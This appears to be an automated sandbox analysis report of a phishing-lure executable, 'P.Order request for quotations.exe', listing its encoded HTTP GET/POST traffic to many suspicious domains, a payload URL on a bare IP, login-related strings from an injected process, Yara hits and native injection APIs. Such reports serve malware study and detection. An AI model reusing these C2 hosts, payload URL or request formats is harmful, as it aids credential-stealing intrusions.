                      Source: global trafficHTTP traffic detected: GET /shtf/?lX=uP8X&vVgx8nB0=FhU37QPUjXoDR/mkORBYEbzjzv1Jdaom3Ft3Wddglnt/yj+EbctenxscC0kIxMOxkZk08U8HpLn+XILh76EKfBcWBx3ZdyGeG6imEjJY2D+6g27gdHVaycndfCLvnlFPmA== HTTP/1.1Host: www.lifce.lifeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                      Source: global trafficHTTP traffic detected: GET /qkhv/?vVgx8nB0=i51Ixu4M5LOvjs5atst6QhQmAxFvlGpFEg8Yva/DYuN1L4sxQPD0gcYXROip4eIGKLRWO2x5MCzKIlk6eYaz3FYy7ZtcWTJr5uThofgj61z5iUNO0ndKyizlBAbSXj3dvw==&lX=uP8X HTTP/1.1Host: www.2y0uoqwoohvdf5vd.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                      Source: global trafficHTTP traffic detected: GET /gu37/?lX=uP8X&vVgx8nB0=iOl0XSH5CDMOf+V9HZ+UKaCE6FMs6uPW7cxb7UU6mqRal+VgoP4cf7GVxAN/lcjotRpWXcIGUQ8s/QpRPpBC0s0rNGXrLX7QDONBrJAsmoe5Xjn3FbB7jvONWBxWv0+Npg== HTTP/1.1Host: www.ethereumkeeper.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                      Source: global trafficHTTP traffic detected: GET /36cg/?vVgx8nB0=c6lcAlso4cwdWdj8OmW47AtI274xiSR94bq7w+xrmdROEAiOB56qTuKvZNoCgSLBfC/6u7yUdjQUAHkJ36WqigWvF+W/duDuE7nAcq/mnuhXg7Y1Cc7r91JMMuzgajzb2w==&lX=uP8X HTTP/1.1Host: www.blogkart4u.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                      Source: global trafficHTTP traffic detected: GET /4w1v/?vVgx8nB0=XpAG9fe2pLhJKmhZ85et2/QP5MtwFiP0J2u6NTgZVwSRoaiRiOX3KjlWgf7AqOqvMoNp5Q5VLCDsww+9yNor5ytr2WIHcAqjmNJrHjaZFAGyn8W5/AYut6n/+WvKvTb4gg==&lX=uP8X HTTP/1.1Host: www.xiongding.techAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                      Source: global trafficHTTP traffic detected: GET /hlq7/?lX=uP8X&vVgx8nB0=dKN4O6z/N4DapGrcMOyrOAnbRVSrFobPG5RCVPQvSrMdLQWk1/Pc73VtQKyrUXqHVsljfksdfGpNujtuX/ZsoQbQw1ZjcAXf/RBxpP3vDPBqvfaPTUP+zIuVIrlIxG7UVQ== HTTP/1.1Host: www.savposalore.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                      Source: global trafficHTTP traffic detected: GET /ti21/?vVgx8nB0=WGxoXqct8zJEPhtv7hvcADdTxPrqYVBaAgo9WLM116GuHzjz/IohiFqyzVfMSqM9DJaG8JlLLxRiginV+Pkm5SzO6x71SPK57QSrEA4wlUVlvQvqLEJhjjQQTB+w8Fkx0A==&lX=uP8X HTTP/1.1Host: www.splogi.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                      Source: global trafficHTTP traffic detected: GET /pzq1/?vVgx8nB0=oDRqyMa6fuBuz7WmYIBwRJUpV6l9q4FTd5aLt2B5ybsFCSl98v1LZFy0dWfSbHe14Kep4ozyTwqi5TiZwq01U//3mNoy1jqeIyDC7DcZZUyW/Gu+bds5KjNjbZauKnuP5A==&lX=uP8X HTTP/1.1Host: www.knowesis.appAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1
                      Source: global trafficDNS traffic detected: DNS query: 241.42.69.40.in-addr.arpa
                      Source: global trafficDNS traffic detected: DNS query: www.crosspatches.info
                      Source: global trafficDNS traffic detected: DNS query: www.quo1ybjmkhdqljoz.top
                      Source: global trafficDNS traffic detected: DNS query: www.lenzor.xyz
                      Source: global trafficDNS traffic detected: DNS query: www.warc.tech
                      Source: global trafficDNS traffic detected: DNS query: www.031233720.xyz
                      Source: global trafficDNS traffic detected: DNS query: www.dualbitcoin.xyz
                      Source: global trafficDNS traffic detected: DNS query: www.lifce.life
                      Source: global trafficDNS traffic detected: DNS query: www.2y0uoqwoohvdf5vd.top
                      Source: global trafficDNS traffic detected: DNS query: www.ethereumkeeper.xyz
                      Source: global trafficDNS traffic detected: DNS query: www.moonavatar.xyz
                      Source: global trafficDNS traffic detected: DNS query: www.blogkart4u.xyz
                      Source: global trafficDNS traffic detected: DNS query: www.xiongding.tech
                      Source: global trafficDNS traffic detected: DNS query: www.savposalore.shop
                      Source: global trafficDNS traffic detected: DNS query: www.splogi.xyz
                      Source: global trafficDNS traffic detected: DNS query: www.knowesis.app
                      Source: unknownHTTP traffic detected: POST /ynw5/ HTTP/1.1Host: www.quo1ybjmkhdqljoz.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Origin: http://www.quo1ybjmkhdqljoz.topReferer: http://www.quo1ybjmkhdqljoz.top/ynw5/Connection: closeCache-Control: no-cacheContent-Length: 209Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (X11; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1 Data Ascii: vVgx8nB0=UHXzit5ihmnuVEdmWqoGHQ0XMjpUSfMrHPq8wCzNIVxCRtfu6U36QvYenTtgshoNIcpdY8ZVQNyRfvL+38e/j0m9ptFxYRbWfmo6DPaJLHkakFwIo/xPuWGz4o3kHsodeogedfV5HicEbcBy2ayt3SPJ6IzmWXKeG8EA+mc7JY68MndqcO1o0t3W466S4VZFWEVATDg=
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 08:12:03 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 08:12:06 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 08:12:08 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 11 Mar 2025 08:12:11 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8 Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 146Content-Type: text/htmlDate: Tue, 11 Mar 2025 08:12:17 GMTServer: nginxConnection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 146Content-Type: text/htmlDate: Tue, 11 Mar 2025 08:12:20 GMTServer: nginxConnection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 146Content-Type: text/htmlDate: Tue, 11 Mar 2025 08:12:22 GMTServer: nginxConnection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 146Content-Type: text/htmlDate: Tue, 11 Mar 2025 08:12:25 GMTServer: nginxConnection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 11 Mar 2025 08:13:20 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Last-Modified: Thu, 28 Nov 2024 18:44:51 GMT | cf-cache-status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QcXwpkZ1BJnNSKSjmZMhPEnq4verFRFM14aeifZMlfOcVcdOjaF1FBQHyANGkV7IlPddxWLSo5Uvof6sRxtvWZTLkCK6GAWVbonFEL4GdlJsX8hi7r1xvf884PslEtnLB7TpmGh2bw%3D%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 91e9978a780d06a1-EWR | Content-Encoding: gzip | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=2071&min_rtt=2071&rtt_var=1035&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=698&delivery_rate=0&cwnd=79&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 11 Mar 2025 08:13:23 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Last-Modified: Thu, 28 Nov 2024 18:44:51 GMT | cf-cache-status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lUfgzbkt3l3LUlIBHKpaoJ6vApaY4Ga4xAtUCk%2F256BFXMgdHDFe7Q14xl7qwebRHFlV1kPDxCr3EIgDIW2Tqj2gf0Ee1Ew1eMoIZRUB99wrSgpW5azvSFdB8aX3hA%2BDhkD1VvZYHw%3D%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 91e9979a48df424d-EWR | Content-Encoding: gzip | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=1717&min_rtt=1717&rtt_var=858&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=718&delivery_rate=0&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 11 Mar 2025 08:13:25 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Last-Modified: Thu, 28 Nov 2024 18:44:51 GMT | cf-cache-status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pZ%2FtjneU4od2oWmOCkQpq6oHN4mShuRpemD3Z0k1GSquoMqFr8g4CuEAB4GcT5i04NEz%2FWisJvfQlRuoCA%2BiW1FLV4zHdSob9uwFshnOb1i9BbkNAXsdPMajbrH85WADdYZafWtnTw%3D%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 91e997aa399b8c3b-EWR | Content-Encoding: gzip | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=1950&min_rtt=1950&rtt_var=975&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=710&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Tue, 11 Mar 2025 08:13:28 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Last-Modified: Thu, 28 Nov 2024 18:44:51 GMT | cf-cache-status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IQSB4E4GriSAx0BNMrkMypghU9IXcx2VLi%2BMPUdz1QODSpKFWFz41xyYElRkBvSJx%2Ff83jd1737F59CGzA0hElgA9AwLURwFBep0Dfi7WonH4HiZLTgraMo0GRxGUmzov9E%2FesVLcw%3D%3D"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 91e997ba2f5a32f4-EWR | alt-svc: h3=":443"; ma=86400 | server-timing: cfL4;desc="?proto=TCP&rtt=1809&min_rtt=1809&rtt_var=904&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=430&delivery_rate=0&cwnd=115&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" | Data Ascii: 604<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>404 &mdash; Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="description" content="Sorry, page not found"/> <style type="text/c
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Tue, 11 Mar 2025 08:13:34 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Last-Modified: Thu, 27 Feb 2020 04:57:13 GMT | ETag: W/"1f2b-59f878ddd2a87" | Content-Encoding: gzip
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Tue, 11 Mar 2025 08:13:37 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Last-Modified: Thu, 27 Feb 2020 04:57:13 GMT | ETag: W/"1f2b-59f878ddd2a87" | Content-Encoding: gzip
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Tue, 11 Mar 2025 08:13:39 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Last-Modified: Thu, 27 Feb 2020 04:57:13 GMT | ETag: W/"1f2b-59f878ddd2a87" | Content-Encoding: gzip
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Tue, 11 Mar 2025 08:13:42 GMT | Content-Type: text/html | Content-Length: 7979 | Connection: close | Vary: Accept-Encoding | Last-Modified: Thu, 27 Feb 2020 04:57:13 GMT | ETag: "1f2b-59f878ddd2a87"
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 (Ubuntu) | Date: Tue, 11 Mar 2025 08:13:49 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Content-Encoding: gzip
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 (Ubuntu) | Date: Tue, 11 Mar 2025 08:13:51 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Content-Encoding: gzip
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 (Ubuntu) | Date: Tue, 11 Mar 2025 08:13:54 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Content-Encoding: gzip
                      Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 (Ubuntu) | Date: Tue, 11 Mar 2025 08:13:57 GMT | Content-Type: text/html | Content-Length: 162 | Connection: close | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
                      Source: P.Order request for quotations.exe, 00000000.00000002.1034894237.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, HashSize.exe, 00000007.00000002.1280129644.00000000025E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://196.251.83.222
                      Source: P.Order request for quotations.exe, 00000000.00000002.1034894237.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, HashSize.exe, 00000007.00000002.1280129644.00000000025E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://196.251.83.222/win32/panel/uploads/Gdugwwjztt.pdf
                      Source: P.Order request for quotations.exe, HashSize.exe.0.dr | String found in binary or memory: http://196.251.83.222/win32/panel/uploads/Gdugwwjztt.pdfYX
                      Source: finger.exe, 00000005.00000002.3362990233.0000000004B3C000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: http://ibm-p8-kvm-03-guest-02.virt.pnr.lab.eng.rdu2.redhat.com/
                      Source: P.Order request for quotations.exe, 00000000.00000002.1034894237.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, HashSize.exe, 00000007.00000002.1280129644.00000000025E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: Q1o6bM9jrUC5ov0.exe, 00000004.00000002.3366174794.0000000006436000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.knowesis.app
                      Source: Q1o6bM9jrUC5ov0.exe, 00000004.00000002.3366174794.0000000006436000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.knowesis.app/pzq1/
                      Source: finger.exe, 00000005.00000003.1351966757.0000000007738000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org?q=
                      Source: Q1o6bM9jrUC5ov0.exe, 00000004.00000002.3364508387.00000000057DE000.00000004.80000000.00040000.00000000.sdmp, finger.exe, 00000005.00000002.3362990233.0000000004CCE000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://ad.netowl.jp/js/star-errorpage.js?date=
                      Source: finger.exe, 00000005.00000003.1351966757.0000000007738000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: finger.exe, 00000005.00000003.1351966757.0000000007738000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: finger.exe, 00000005.00000003.1351966757.0000000007738000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: finger.exe, 00000005.00000003.1351966757.0000000007738000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: finger.exe, 00000005.00000003.1351966757.0000000007738000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
                      Source: finger.exe, 00000005.00000003.1351966757.0000000007738000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: Q1o6bM9jrUC5ov0.exe, 00000004.00000002.3364508387.0000000004506000.00000004.80000000.00040000.00000000.sdmp, finger.exe, 00000005.00000002.3362990233.00000000039F6000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://error.skycloud.tw/system/error?code=400
                      Source: finger.exe, 00000005.00000003.1351966757.0000000007738000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://gemini.google.com/app?q=
                      Source: P.Order request for quotations.exe, 00000000.00000002.1048429957.0000000006640000.00000004.08000000.00040000.00000000.sdmp, HashSize.exe, 00000007.00000002.1316719764.00000000035F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/mgravell/protobuf-net
                      Source: P.Order request for quotations.exe, 00000000.00000002.1048429957.0000000006640000.00000004.08000000.00040000.00000000.sdmp, HashSize.exe, 00000007.00000002.1316719764.00000000035F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/mgravell/protobuf-netJ
                      Source: P.Order request for quotations.exe, 00000000.00000002.1048429957.0000000006640000.00000004.08000000.00040000.00000000.sdmp, HashSize.exe, 00000007.00000002.1316719764.00000000035F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/mgravell/protobuf-neti
                      Source: finger.exe, 00000005.00000002.3359394622.00000000028AF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                      Source: finger.exe, 00000005.00000002.3359394622.00000000028AF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                      Source: finger.exe, 00000005.00000003.1347173913.0000000007725000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                      Source: finger.exe, 00000005.00000002.3359394622.00000000028AF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                      Source: finger.exe, 00000005.00000002.3359394622.00000000028AF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                      Source: finger.exe, 00000005.00000002.3359394622.00000000028AF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                      Source: finger.exe, 00000005.00000002.3359394622.00000000028AF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                      Source: P.Order request for quotations.exe, 00000000.00000002.1048429957.0000000006640000.00000004.08000000.00040000.00000000.sdmp, HashSize.exe, 00000007.00000002.1316719764.0000000003669000.00000004.00000800.00020000.00000000.sdmp, HashSize.exe, 00000007.00000002.1316719764.00000000035F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                      Source: P.Order request for quotations.exe, 00000000.00000002.1048429957.0000000006640000.00000004.08000000.00040000.00000000.sdmp, P.Order request for quotations.exe, 00000000.00000002.1034894237.0000000002B0C000.00000004.00000800.00020000.00000000.sdmp, HashSize.exe, 00000007.00000002.1316719764.0000000003669000.00000004.00000800.00020000.00000000.sdmp, HashSize.exe, 00000007.00000002.1316719764.00000000035F1000.00000004.00000800.00020000.00000000.sdmp, HashSize.exe, 00000007.00000002.1280129644.000000000267C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://stackoverflow.com/q/14436606/23354
                      Source: P.Order request for quotations.exe, 00000000.00000002.1048429957.0000000006640000.00000004.08000000.00040000.00000000.sdmp, HashSize.exe, 00000007.00000002.1316719764.0000000003669000.00000004.00000800.00020000.00000000.sdmp, HashSize.exe, 00000007.00000002.1316719764.00000000035F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://stackoverflow.com/q/2152978/23354
                      Source: finger.exe, 00000005.00000003.1351966757.0000000007738000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/v20w
                      Source: finger.exe, 00000005.00000003.1351966757.0000000007738000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                      Source: Q1o6bM9jrUC5ov0.exe, 00000004.00000002.3364508387.00000000057DE000.00000004.80000000.00040000.00000000.sdmp, finger.exe, 00000005.00000002.3362990233.0000000004CCE000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://www.star.ne.jp/

                      E-Banking Fraud

                      Source: Yara matchFile source: 2.2.P.Order request for quotations.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.P.Order request for quotations.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000002.3358405901.0000000000310000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3366174794.00000000063C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1160607644.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.3359171063.0000000002800000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1187484394.0000000004640000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.3358967031.00000000025B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.3362082192.00000000029A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1170345518.0000000001B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                      System Summary

                      Source: initial sample Static PE information: Filename: P.Order request for quotations.exe
                      Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 0_2_0669C780 NtResumeThread,0_2_0669C780
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 0_2_06698B00 NtProtectVirtualMemory,0_2_06698B00
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 0_2_0669C778 NtResumeThread,0_2_0669C778
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 0_2_06698AF9 NtProtectVirtualMemory,0_2_06698AF9
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_0042CE23 NtClose,2_2_0042CE23
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B2B60 NtClose,LdrInitializeThunk,2_2_017B2B60
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B2DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_017B2DF0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B2C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_017B2C70
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B35C0 NtCreateMutant,LdrInitializeThunk,2_2_017B35C0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B4340 NtSetContextThread,2_2_017B4340
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B4650 NtSuspendThread,2_2_017B4650
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B2BF0 NtAllocateVirtualMemory,2_2_017B2BF0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B2BE0 NtQueryValueKey,2_2_017B2BE0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B2BA0 NtEnumerateValueKey,2_2_017B2BA0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B2B80 NtQueryInformationFile,2_2_017B2B80
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B2AF0 NtWriteFile,2_2_017B2AF0
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: 2_2_017B2AD0 NtReadFile,2_2_017B2AD0
